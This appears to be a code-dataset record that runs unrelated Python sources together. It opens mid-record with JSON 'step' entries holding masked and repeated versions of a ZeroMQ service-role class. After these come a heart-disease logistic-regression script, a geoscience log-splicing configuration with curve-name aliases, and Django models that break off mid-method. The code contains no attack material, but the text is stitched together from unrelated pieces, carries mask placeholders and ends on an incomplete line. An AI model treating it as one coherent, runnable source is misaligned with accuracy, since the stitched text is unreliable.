up'\n self.logger.debug(msg)\n <mask token>\n",
"step-4": "from logging import getLogger\nfrom time import sleep\nfrom uuid import UUID\nfrom zmq import Context, Poller, POLLIN, ZMQError, ETERM\nfrom zhelpers import zpipe\nfrom dcamp.service.configuration import Configuration\nfrom dcamp.types.messages.control import SOS\nfrom dcamp.types.specs import EndpntSpec\nfrom dcamp.util.decorators import runnable\n\n\n@runnable\nclass RoleMixin(object):\n\n def __init__(self, pipe, ep, uuid):\n self.ctx = Context.instance()\n self.__control_pipe = pipe\n assert isinstance(ep, EndpntSpec)\n self.__endpoint = ep\n assert isinstance(uuid, UUID)\n self.__uuid = uuid\n self.__config_service = None\n self.logger = getLogger('dcamp.role.%s' % self)\n self.__services = {}\n\n def __str__(self):\n return self.__class__.__name__\n\n def __send_control_str(self, message):\n self.__control_pipe.send_string(message)\n\n def __recv_control(self):\n return self.__control_pipe.recv_string()\n\n def get_config_service(self):\n return self.__config_service\n\n def get_config_service_kvdict(self):\n assert self.__config_service is not None\n return self.__config_service.copy_kvdict()\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx)\n service = cls(peer, self.__endpoint, self.__uuid, self.\n __config_service, *args, **kwargs)\n self.__services[pipe] = service\n if Configuration == cls:\n self.__config_service = service\n\n def sos(self):\n SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)\n\n def play(self):\n for service in self.__services.values():\n service.start()\n self.run_state()\n self.logger.debug('waiting for control commands')\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt:\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n return self.__cleanup()\n\n def __cleanup(self):\n if not self.in_errored_state:\n self.__stop()\n for pipe in self.__services:\n pipe.close()\n del self.__services\n self.__control_pipe.close()\n del self.__control_pipe\n self.logger.debug('role cleanup finished; exiting')\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n poller = Poller()\n for pipe, svc in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n sleep(1)\n max_attempts = len(self.__services)\n attempts = 0\n while self.__some_alive() and attempts < max_attempts:\n attempts += 1\n items = dict(poller.poll(60000))\n alive = dict(self.__services)\n for pipe, svc in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug(\n 'received STOPPED control reply from %s service' %\n svc)\n svc.join(timeout=5)\n if svc.is_alive():\n self.logger.error(\n '%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc\n )\n poller.unregister(pipe)\n pipe.close()\n del self.__services[pipe]\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % ([str(s\n ) for s in self.__services.values()], 
attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving up'\n self.logger.debug(msg)\n\n def __some_alive(self):\n \"\"\"returns True if at least one service of this Role is still running\"\"\"\n for service in self.__services.values():\n if service.is_alive():\n return True\n return False\n",
"step-5": "from logging import getLogger\nfrom time import sleep\nfrom uuid import UUID\n\nfrom zmq import Context, Poller, POLLIN, ZMQError, ETERM # pylint: disable-msg=E0611\nfrom zhelpers import zpipe\n\nfrom dcamp.service.configuration import Configuration\nfrom dcamp.types.messages.control import SOS\nfrom dcamp.types.specs import EndpntSpec\nfrom dcamp.util.decorators import runnable\n\n\n@runnable\nclass RoleMixin(object):\n def __init__(\n self,\n pipe,\n ep,\n uuid,\n ):\n self.ctx = Context.instance()\n self.__control_pipe = pipe\n\n assert isinstance(ep, EndpntSpec)\n self.__endpoint = ep\n\n assert isinstance(uuid, UUID)\n self.__uuid = uuid\n\n self.__config_service = None\n\n self.logger = getLogger('dcamp.role.%s' % self)\n\n # { pipe: service, ...}\n self.__services = {}\n\n def __str__(self):\n return self.__class__.__name__\n\n def __send_control_str(self, message):\n self.__control_pipe.send_string(message)\n\n def __recv_control(self):\n return self.__control_pipe.recv_string()\n\n def get_config_service(self):\n return self.__config_service\n\n def get_config_service_kvdict(self):\n assert self.__config_service is not None\n return self.__config_service.copy_kvdict()\n\n def _add_service(self, cls, *args, **kwargs):\n pipe, peer = zpipe(self.ctx) # create control socket pair\n # create service, passing local values along with rest of given args\n service = cls(peer, self.__endpoint, self.__uuid, self.__config_service, *args, **kwargs)\n self.__services[pipe] = service # add to our dict, using pipe socket as key\n if Configuration == cls:\n self.__config_service = service\n\n def sos(self):\n SOS(self.__endpoint, self.__uuid).send(self.__control_pipe)\n\n def play(self):\n # start each service thread\n for service in self.__services.values():\n service.start()\n\n # @todo: wait for READY message from each service / issue #37\n\n self.run_state()\n self.logger.debug('waiting for control commands')\n\n # listen for control commands from caller\n while self.in_running_state:\n try:\n msg = self.__recv_control()\n\n if 'STOP' == msg:\n self.__send_control_str('OKAY')\n self.logger.debug('received STOP control command')\n self.stop_state()\n break\n else:\n self.__send_control_str('WTF')\n self.logger.error('unknown control command: %s' % msg)\n\n except ZMQError as e:\n if e.errno == ETERM:\n self.logger.debug('received ETERM')\n self.error_state()\n break\n else:\n raise\n except KeyboardInterrupt: # only for roles played by dcamp.App\n self.logger.debug('received KeyboardInterrupt')\n self.stop_state()\n break\n\n # role is exiting; cleanup\n return self.__cleanup()\n\n def __cleanup(self):\n # stop our services cleanly (if we can)\n if not self.in_errored_state:\n # @todo: this might raise an exception / issue #38\n self.__stop()\n\n # shared context; will be term()'ed by caller\n\n # close all service sockets\n for pipe in self.__services:\n pipe.close()\n del self.__services\n\n # close our own control pipe\n self.__control_pipe.close()\n del self.__control_pipe\n\n self.logger.debug('role cleanup finished; exiting')\n\n def __stop(self):\n \"\"\" try to stop all of this Role's services \"\"\"\n\n # send commands\n poller = Poller()\n for (pipe, svc) in self.__services.items():\n pipe.send_string('STOP')\n self.logger.debug('sent STOP command to %s service' % svc)\n poller.register(pipe, POLLIN)\n\n # give services a few seconds to cleanup and exit before checking responses\n sleep(1)\n\n max_attempts = len(self.__services)\n attempts = 0\n\n while self.__some_alive() 
and attempts < max_attempts:\n attempts += 1\n\n # poll for any replies\n items = dict(poller.poll(60000)) # wait for messages\n\n # mark responding services as stopped\n alive = dict(self.__services) # make copy\n for (pipe, svc) in alive.items():\n if pipe in items:\n reply = pipe.recv_string()\n if 'STOPPED' == reply:\n self.logger.debug('received STOPPED control reply from %s service' % svc)\n svc.join(timeout=5) # STOPPED response should be sent right before svc exit\n if svc.is_alive():\n self.logger.error('%s service is still alive; not waiting' % svc)\n else:\n self.logger.debug('%s service thread stopped' % svc)\n poller.unregister(pipe)\n pipe.close()\n del (self.__services[pipe])\n else:\n self.logger.debug('unknown control reply: %s' % reply)\n\n # log some useful info\n if len(self.__services) > 0:\n msg = '%s services still alive after %d cycles; ' % (\n [str(s) for s in self.__services.values()], attempts)\n if attempts < max_attempts:\n msg += 'waiting'\n else:\n msg += 'giving up'\n self.logger.debug(msg)\n\n def __some_alive(self):\n \"\"\"returns True if at least one service of this Role is still running\"\"\"\n for service in self.__services.values():\n if service.is_alive():\n return True\n return False\n",
"step-ids": [
4,
10,
11,
14,
15
]
}
|
[
4,
10,
11,
14,
15
] |
# import libraries
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import warnings
import pickle
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import accuracy_score
from sklearn.metrics import mean_squared_error
import math
from sklearn.model_selection import cross_validate
# read the csv file
dataset = pd.read_csv('heart.csv')
#copy the dataset
df = dataset.copy()
# make X and Y
X = df.drop(['target'], axis=1).values
Y = df.target.values
# correlation matrix
corr_mat = df.corr()
# split based on training and test dataset
x_train, x_test, y_train, y_test = \
train_test_split(X,Y,test_size =0.3,random_state=1234,stratify=Y)
# Logistic regression
lr = LogisticRegression()
lr.fit(x_train, y_train)
y_predict = lr.predict(x_test)
train_score = lr.score(x_train, y_train)
test_score = lr.score(x_test, y_test)
# accuracy score
acc_score = accuracy_score(y_test, y_predict)
rmse = math.sqrt(mean_squared_error(y_test, y_predict))
# Cross validation
lr_cross = LogisticRegression()
cv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)
test_cv_avg = np.average(cv_results_lr['test_score'])
train_cv_avg = np.average(cv_results_lr['train_score'])
pickle.dump(lr, open('model.pkl','wb'))
|
normal
|
{
"blob_id": "1508697f93114d7f20182a3e9c1df5617904529a",
"index": 8725,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlr.fit(x_train, y_train)\n<mask token>\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-3": "<mask token>\ndataset = pd.read_csv('heart.csv')\ndf = dataset.copy()\nX = df.drop(['target'], axis=1).values\nY = df.target.values\ncorr_mat = df.corr()\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,\n random_state=1234, stratify=Y)\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\ny_predict = lr.predict(x_test)\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\nacc_score = accuracy_score(y_test, y_predict)\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\nlr_cross = LogisticRegression()\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-4": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport warnings\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import cross_validate\ndataset = pd.read_csv('heart.csv')\ndf = dataset.copy()\nX = df.drop(['target'], axis=1).values\nY = df.target.values\ncorr_mat = df.corr()\nx_train, x_test, y_train, y_test = train_test_split(X, Y, test_size=0.3,\n random_state=1234, stratify=Y)\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\ny_predict = lr.predict(x_test)\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\nacc_score = accuracy_score(y_test, y_predict)\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\nlr_cross = LogisticRegression()\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\npickle.dump(lr, open('model.pkl', 'wb'))\n",
"step-5": "# import libraries\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport warnings\nimport pickle\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import mean_squared_error\nimport math\nfrom sklearn.model_selection import cross_validate\n\n\n# read the csv file\ndataset = pd.read_csv('heart.csv')\n\n#copy the dataset\ndf = dataset.copy()\n\n# make X and Y\nX = df.drop(['target'], axis=1).values\nY = df.target.values\n\n\n# correleation matrix\ncorr_mat = df.corr()\n\n\n# split based on training and test dataset\n\nx_train, x_test, y_train, y_test = \\\n train_test_split(X,Y,test_size =0.3,random_state=1234,stratify=Y)\n \n\n# Logistic regression\n\nlr = LogisticRegression()\nlr.fit(x_train, y_train)\n\ny_predict = lr.predict(x_test)\n\ntrain_score = lr.score(x_train, y_train)\ntest_score = lr.score(x_test, y_test)\n\n\n# accuracy score\n\nacc_score = accuracy_score(y_test, y_predict)\n\n\nrmse = math.sqrt(mean_squared_error(y_test, y_predict))\n\n\n# Cross validation\n\nlr_cross = LogisticRegression()\n\ncv_results_lr = cross_validate(lr_cross, X, Y, cv=10, return_train_score=True)\n\ntest_cv_avg = np.average(cv_results_lr['test_score'])\ntrain_cv_avg = np.average(cv_results_lr['train_score'])\n\npickle.dump(lr, open('model.pkl','wb'))\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
PROJECT_ID = "aaet-geoscience-dev"
# The tmp folder is for lasio I/O purposes
DATA_PATH = "/home/airflow/gcs/data/tmp"
# Credential JSON key for accessing other projects
# CREDENTIALS_JSON = "gs://aaet_zexuan/flow/keys/composer_las_merge.json"
CREDENTIALS_JSON = "keys/composer_las_merge.json"
# Bucket name for merged las files and spliced las files
BUCKET_LAS_MERGE = "las_merged"
BUCKET_LAS_SPLICE = "us-central1-lithos-dev-94beb3d4-bucket"
# las_splice.py outputs to the composer data folder, which serves as input for logqc
COMPOSER_FOLDER = "data/logqc_landing"
TMP_FOLDER = "data/tmp"
# for GCP web UI and Big Query Job Status Report
BUCKET_JOB = "log_splice_tool_jobs"
BIGQUERY_DATASET_ID = "urc_jobs"
BIGQUERY_TABLE_ID = "jobs"
# Workflow type
tpt_workflow_type = "tpt"
logsplice_workflow_type = "logsplice"
logqc_workflow_type = "logqc"
geomech_workflow_type = "geomech"
# Number of processors for las_merge_MP (multiprocessing).
N_PROCESSORS = 16
# The window size for moving average, e.g. 11 means the window covers a
# point and 5 adjacent points on both sides
MOVING_AVG_WINDOW_SIZE = 11
# Default value for missing data, usually it is either -999.25 or -999.0
MISSING = -999.0
# COL_DICT: a dictionary of aliased curve names for log splicing. keys correspond to measurements
# (e.g., 'density', 'gamma', 'resistivity', etc.),
# and each value is a list of aliased column names that could potentially correspond
# to those measurements. Each key is the standard curve name used after splicing,
# and its value lists the aliased curve names that may appear before splicing.
COL_DICT = {
# Caliper
"cal": ["CAL", "CALI", "CALX", "HCAL", "TGS_CALX", "RAW_CALX"],
# Compressional Sonic Slowness
"dtc": ["DT", "DT24", "DTC", 'TGS_DT', "TGS_DTC", "RAW_DT", "RAW_DTC"],
# Deep Resistivity
# 'rdeep' includes 'rdeep_ltrl' (laterolog), 'rdeep_indct' (induction), 'rdeep_unknown'.
# A final 'rdeep' will be generated
# with an additional 'rdeep_type' curve to denote the log type.
"rdeep": ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90', 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'],
# Density (Bulk)
"rhob": ["DEN", "RHOB", "RHOZ", "ZDEN", "ZDNC", "TGS_RHOB", 'RAW_RHOB'],
# Density (Correction)
"drho": ["DRHO", "HDRA", "ZCOR"],
# Gamma Ray
"gr": ["APC_GR_NRM", "GAMM", "GR", "GR_R", "GRR", 'SGR', 'SGRR', 'CGR'],
# Neutron Porosity
"nphil": ["CNCF", "NEU", "NPOR", "NPHI", "NPHIL", "TNPH", 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'],
# Photoelectric effect
"pe": ["PE", "PEF", "PEFZ", 'TGS_PE', 'RAW_PE'],
}
# LLD is laterolog
# The rest are inductions
# RDEEP, RES, RES_DEEP are of unknown origin
# __log_type_rdeep = [log_type_enum.induction, #AHT90
# log_type_enum.induction, #AT90
# log_type_enum.induction, #ILD
# log_type_enum.induction, #ILT90
# log_type_enum.laterolog, #LLD
# log_type_enum.induction, #M2R9
# log_type_enum.unknown, #RDEEP
# log_type_enum.unknown, #RES
# log_type_enum.unknown] #RES_DEEP
RDEEP_TYPE_LIST = ["rdeep_ltrl", "rdeep_indct", "rdeep_unknown"]
RDEEP_TYPE_DICT = {"rdeep_ltrl": 1, "rdeep_indct": 2, "rdeep_unknown": 3}
# curve description dictionary
CURVE_DESC = {
"DEPT": "Depth",
"CAL": "Caliper",
"DRHO": "Density Correction",
"DTC": "Compressional Wave Slowness",
"DTS": "Shear Wave Slowness",
"GR": "Gamma Ray",
"NPHI": "Neutron Porosity",
"NPHIL": "Neutron Porosity",
"PE": "Photoelectric Effect",
"RDEEP": "Deep Resistivity",
"RDEEP_LTRL": "Laterolog Resistivity",
"RDEEP_INDCT": "Induction Resistivity",
"RDEEP_UNKNOWN": "Unknown Resistivity (Laterolog or Induction)",
"RDEEP_TYPE": "RDEEP Type 1:Laterolog 2:Induction 3:Unknown",
"RHOB": "Bulk Density",
"RUGOSITY": "Borehole Rugosity",
"RUGOSITY_BHF": "Rugosity Bad Hole Flag",
"DRHO_BHF": "Density Correction Bad Hole Flag",
"DTC_BHF": "Sonic Bad Hole Flag",
"GR_BHF": "Gamma Ray Bad Hole Flag",
"NPHIL_BHF": "Neutron Bad Hole Flag",
"RHOB_BHF": "Density Bad Hole Flag",
"LOG_RDEEP_BHF": "Resistivity Bad Hole Flag",
"PE_BHF": "PE Bad Hole Flag",
"RHOB_MCF": "Density Corrected from Multiwell Flag",
"RHOB_SYN": "Density Estimation from Ensemble of Learners",
"NPHI_MCF": "Neutron Corrected from Multiwell Flag",
"NPHI_SYN": "Neutron Estimation from Ensemble of Learners",
"DTC_MCF": "Sonic Corrected from Multiwell Flag",
"DTC_SYN": "Sonic Estimation from Ensemble of Learners",
"PE_MCF": "PE Corrected from Multiwell Flag",
"PE_SYN": "PE Estimation from Ensemble of Learners",
"RHOB_NCF": "Density No Correction Flag",
"RHOB_CORR": "Density Corrected",
"NPHI_NCF": "Neutron No Correction Flag",
"NPHI_CORR": "Neutron Corrected",
"DTC_NCF": "Sonic No Correction Flag",
"DTC_CORR": "Sonic Corrected",
"PE_NCF": "PE No Correction Flag",
"PE_CORR": "PE Corrected"
}
|
normal
|
{
"blob_id": "0b2a036b806cca6e7f58008040b3a261a8bc844d",
"index": 4092,
"step-1": "<mask token>\n",
"step-2": "PROJECT_ID = 'aaet-geoscience-dev'\nDATA_PATH = '/home/airflow/gcs/data/tmp'\nCREDENTIALS_JSON = 'keys/composer_las_merge.json'\nBUCKET_LAS_MERGE = 'las_merged'\nBUCKET_LAS_SPLICE = 'us-central1-lithos-dev-94beb3d4-bucket'\nCOMPOSER_FOLDER = 'data/logqc_landing'\nTMP_FOLDER = 'data/tmp'\nBUCKET_JOB = 'log_splice_tool_jobs'\nBIGQUERY_DATASET_ID = 'urc_jobs'\nBIGQUERY_TABLE_ID = 'jobs'\ntpt_workflow_type = 'tpt'\nlogsplice_workflow_type = 'logsplice'\nlogqc_workflow_type = 'logqc'\ngeomech_workflow_type = 'geomech'\nN_PROCESSORS = 16\nMOVING_AVG_WINDOW_SIZE = 11\nMISSING = -999.0\nCOL_DICT = {'cal': ['CAL', 'CALI', 'CALX', 'HCAL', 'TGS_CALX', 'RAW_CALX'],\n 'dtc': ['DT', 'DT24', 'DTC', 'TGS_DT', 'TGS_DTC', 'RAW_DT', 'RAW_DTC'],\n 'rdeep': ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90',\n 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'], 'rhob': ['DEN',\n 'RHOB', 'RHOZ', 'ZDEN', 'ZDNC', 'TGS_RHOB', 'RAW_RHOB'], 'drho': [\n 'DRHO', 'HDRA', 'ZCOR'], 'gr': ['APC_GR_NRM', 'GAMM', 'GR', 'GR_R',\n 'GRR', 'SGR', 'SGRR', 'CGR'], 'nphil': ['CNCF', 'NEU', 'NPOR', 'NPHI',\n 'NPHIL', 'TNPH', 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'], 'pe': [\n 'PE', 'PEF', 'PEFZ', 'TGS_PE', 'RAW_PE']}\nRDEEP_TYPE_LIST = ['rdeep_ltrl', 'rdeep_indct', 'rdeep_unknown']\nRDEEP_TYPE_DICT = {'rdeep_ltrl': 1, 'rdeep_indct': 2, 'rdeep_unknown': 3}\nCURVE_DESC = {'DEPT': 'Depth', 'CAL': 'Caliper', 'DRHO':\n 'Density Correction', 'DTC': 'Compressional Wave Slowness', 'DTS':\n 'Shear Wave Slowness', 'GR': 'Gamma Ray', 'NPHI': 'Neutron Porosity',\n 'NPHIL': 'Neutron Porosity', 'PE': 'Photoelectric Effect', 'RDEEP':\n 'Deep Resistivity', 'RDEEP_LTRL': 'Laterolog Resistivity',\n 'RDEEP_INDCT': 'Induction Resistivity', 'RDEEP_UNKNOWN':\n 'Unknown Resistivity (Laterolog or Induction)', 'RDEEP_TYPE':\n 'RDEEP Type 1:Laterolog 2:Induction 3:Unknown', 'RHOB': 'Bulk Density',\n 'RUGOSITY': 'Borehole Rugosity', 'RUGOSITY_BHF':\n 'Rugosity Bad Hole Flag', 'DRHO_BHF':\n 'Density Correction Bad Hole Flag', 'DTC_BHF': 'Sonic Bad Hole Flag',\n 'GR_BHF': 'Gamma Ray Bad Hole Flag', 'NPHIL_BHF':\n 'Neutron Bad Hole Flag', 'RHOB_BHF': 'Density Bad Hole Flag',\n 'LOG_RDEEP_BHF': 'Resistivity Bad Hole Flag', 'PE_BHF':\n 'PE Bad Hole Flag', 'RHOB_MCF': 'Density Corrected from Multiwell Flag',\n 'RHOB_SYN': 'Density Estimation from Ensemble of Learners', 'NPHI_MCF':\n 'Neutron Corrected from Multiwell Flag', 'NPHI_SYN':\n 'Neutron Estimation from Ensemble of Learners', 'DTC_MCF':\n 'Sonic Corrected from Multiwell Flag', 'DTC_SYN':\n 'Sonic Estimation from Ensemble of Learners', 'PE_MCF':\n 'PE Corrected from Multiwell Flag', 'PE_SYN':\n 'PE Estimation from Ensemble of Learners', 'RHOB_NCF':\n 'Density No Correction Flag', 'RHOB_CORR': 'Density Corrected',\n 'NPHI_NCF': 'Neutron No Correction Flag', 'NPHI_CORR':\n 'Neutron Corrected', 'DTC_NCF': 'Sonic No Correction Flag', 'DTC_CORR':\n 'Sonic Corrected', 'PE_NCF': 'PE No Correction Flag', 'PE_CORR':\n 'PE Corrected'}\n",
"step-3": "PROJECT_ID = \"aaet-geoscience-dev\"\r\n# The tmp folder is for lasio I/O purposes\r\nDATA_PATH = \"/home/airflow/gcs/data/tmp\"\r\n\r\n# Credential JSON key for accessing other projects\r\n# CREDENTIALS_JSON = \"gs://aaet_zexuan/flow/keys/composer_las_merge.json\"\r\nCREDENTIALS_JSON = \"keys/composer_las_merge.json\"\r\n\r\n# Bucket name for merged las files and spliced las files\r\nBUCKET_LAS_MERGE = \"las_merged\"\r\nBUCKET_LAS_SPLICE = \"us-central1-lithos-dev-94beb3d4-bucket\"\r\n\r\n# las_splice.py output to the composer data folder, as input of logqc\r\nCOMPOSER_FOLDER = \"data/logqc_landing\"\r\nTMP_FOLDER = \"data/tmp\"\r\n# for GCP web UI and Big Query Job Status Report\r\nBUCKET_JOB = \"log_splice_tool_jobs\"\r\nBIGQUERY_DATASET_ID = \"urc_jobs\"\r\nBIGQUERY_TABLE_ID = \"jobs\"\r\n\r\n# Workflow type\r\ntpt_workflow_type = \"tpt\"\r\nlogsplice_workflow_type = \"logsplice\"\r\nlogqc_workflow_type = \"logqc\"\r\ngeomech_workflow_type = \"geomech\"\r\n\r\n# Number of processors for las_merge_MP (multiprocessing).\r\nN_PROCESSORS = 16\r\n\r\n# The window size for moving average, e.g. 11 means the window covers a\r\n# point and 5 adjacent points on both sides\r\nMOVING_AVG_WINDOW_SIZE = 11\r\n\r\n# Default value for missing data, usually it is either -999.25 or -999.0\r\nMISSING = -999.0\r\n\r\n# COL_DICT: a dictionary of aliased curve names for log splicing. keys correspond to measurements\r\n# (e.g., 'density', 'gamma', 'resistivity', etc.),\r\n# and each value is a list of aliased column names that could potentially correspond\r\n# to those measurements. Each key is the aliased curve name before splicing,\r\n# each key's value is the standard curve name after splicing.\r\nCOL_DICT = {\r\n # Caliper\r\n \"cal\": [\"CAL\", \"CALI\", \"CALX\", \"HCAL\", \"TGS_CALX\", \"RAW_CALX\"],\r\n # Compressional Sonic Slowness\r\n \"dtc\": [\"DT\", \"DT24\", \"DTC\", 'TGS_DT', \"TGS_DTC\", \"RAW_DT\", \"RAW_DTC\"],\r\n # Deep Resistivity\r\n # 'rdeep' includes 'rdeep_ltrl' (laterolog), 'rdeep_indct' (induction), 'rdeep_unknown'.\r\n # A final 'rdeep' will be generated\r\n # with an additional 'rdeep_type' curve to denote the log type.\r\n \"rdeep\": ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90', 'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'],\r\n # Density (Bulk)\r\n \"rhob\": [\"DEN\", \"RHOB\", \"RHOZ\", \"ZDEN\", \"ZDNC\", \"TGS_RHOB\", 'RAW_RHOB'],\r\n # Density (Correction)\r\n \"drho\": [\"DRHO\", \"HDRA\", \"ZCOR\"],\r\n # Gamma Ray\r\n \"gr\": [\"APC_GR_NRM\", \"GAMM\", \"GR\", \"GR_R\", \"GRR\", 'SGR', 'SGRR', 'CGR'],\r\n # Neutron Porosity\r\n \"nphil\": [\"CNCF\", \"NEU\", \"NPOR\", \"NPHI\", \"NPHIL\", \"TNPH\", 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'],\r\n # Photoelectric effect\r\n \"pe\": [\"PE\", \"PEF\", \"PEFZ\", 'TGS_PE', 'RAW_PE'],\r\n}\r\n\r\n# LDD is laterolog\r\n# The rest are inductions\r\n# RDEEP, RES, RES_DEEP are of unknown origin\r\n# __log_type_rdeep = [log_type_enum.induction, #AHT90\r\n# log_type_enum.induction, #AT90\r\n# log_type_enum.induction, #ILD\r\n# log_type_enum.induction, #ILT90\r\n# log_type_enum.laterolog, #LLD\r\n# log_type_enum.induction, #M2R9\r\n# log_type_enum.unknown, #RDEEP\r\n# log_type_enum.unknown, #RES\r\n# log_type_enum.unknown] #RES_DEEP\r\n\r\nRDEEP_TYPE_LIST = [\"rdeep_ltrl\", \"rdeep_indct\", \"rdeep_unknown\"]\r\nRDEEP_TYPE_DICT = {\"rdeep_ltrl\": 1, \"rdeep_indct\": 2, \"rdeep_unknown\": 3}\r\n\r\n# curve description dictionary\r\nCURVE_DESC = {\r\n \"DEPT\": \"Depth\",\r\n \"CAL\": \"Caliper\",\r\n 
\"DRHO\": \"Density Correction\",\r\n \"DTC\": \"Compressional Wave Slowness\",\r\n \"DTS\": \"Shear Wave Slowness\",\r\n \"GR\": \"Gamma Ray\",\r\n \"NPHI\": \"Neutron Porosity\",\r\n \"NPHIL\": \"Neutron Porosity\",\r\n \"PE\": \"Photoelectric Effect\",\r\n \"RDEEP\": \"Deep Resistivity\",\r\n \"RDEEP_LTRL\": \"Laterolog Resistivity\",\r\n \"RDEEP_INDCT\": \"Induction Resistivity\",\r\n \"RDEEP_UNKNOWN\": \"Unknown Resistivity (Laterolog or Induction)\",\r\n \"RDEEP_TYPE\": \"RDEEP Type 1:Laterolog 2:Induction 3:Unknown\",\r\n \"RHOB\": \"Bulk Density\",\r\n \"RUGOSITY\": \"Borehole Rugosity\",\r\n \"RUGOSITY_BHF\": \"Rugosity Bad Hole Flag\",\r\n \"DRHO_BHF\": \"Density Correction Bad Hole Flag\",\r\n \"DTC_BHF\": \"Sonic Bad Hole Flag\",\r\n \"GR_BHF\": \"Gamma Ray Bad Hole Flag\",\r\n \"NPHIL_BHF\": \"Neutron Bad Hole Flag\",\r\n \"RHOB_BHF\": \"Density Bad Hole Flag\",\r\n \"LOG_RDEEP_BHF\": \"Resistivity Bad Hole Flag\",\r\n \"PE_BHF\": \"PE Bad Hole Flag\",\r\n \"RHOB_MCF\": \"Density Corrected from Multiwell Flag\",\r\n \"RHOB_SYN\": \"Density Estimation from Ensemble of Learners\",\r\n \"NPHI_MCF\": \"Neutron Corrected from Multiwell Flag\",\r\n \"NPHI_SYN\": \"Neutron Estimation from Ensemble of Learners\",\r\n \"DTC_MCF\": \"Sonic Corrected from Multiwell Flag\",\r\n \"DTC_SYN\": \"Sonic Estimation from Ensemble of Learners\",\r\n \"PE_MCF\": \"PE Corrected from Multiwell Flag\",\r\n \"PE_SYN\": \"PE Estimation from Ensemble of Learners\",\r\n \"RHOB_NCF\": \"Density No Correction Flag\",\r\n \"RHOB_CORR\": \"Density Corrected\",\r\n \"NPHI_NCF\": \"Neutron No Correction Flag\",\r\n \"NPHI_CORR\": \"Neutron Corrected\",\r\n \"DTC_NCF\": \"Sonic No Correction Flag\",\r\n \"DTC_CORR\": \"Sonic Corrected\",\r\n \"PE_NCF\": \"PE No Correction Flag\",\r\n \"PE_CORR\": \"PE Corrected\"\r\n}\r\n",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
from django.contrib.auth import get_user_model
from django.db import models
from django.db.models.signals import post_save
from apps.common.constants import NOTIFICATION_TYPE_CHOICES, INFO
from apps.core.models import BaseModel
from apps.core.utils.helpers import get_upload_path
from apps.core.utils.push_notification import send_push_message
User = get_user_model()
class City(BaseModel):
name = models.CharField(max_length=255, db_index=True)
def __str__(self):
return self.name
class Article(BaseModel):
created_by = models.ForeignKey(User, related_name='articles', on_delete=models.SET_NULL, null=True)
title = models.CharField(max_length=200)
description = models.TextField()
# Below fields are optional
image = models.ImageField(
upload_to=get_upload_path,
blank=True
)
is_archived = models.BooleanField(default=False)
def __str__(self):
return self.title
class UserNotification(BaseModel):
title = models.CharField(max_length=150)
sent_by = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True, related_name='sent_notifications')
sent_to = models.ForeignKey(
User, on_delete=models.SET_NULL, null=True, related_name='notifications')
content = models.TextField(blank=True)
is_read = models.BooleanField(default=False) # To mark notification as read
notification_type = models.CharField(
max_length=15,
choices=NOTIFICATION_TYPE_CHOICES,
default=INFO
)
def __str__(self):
if self.sent_by:
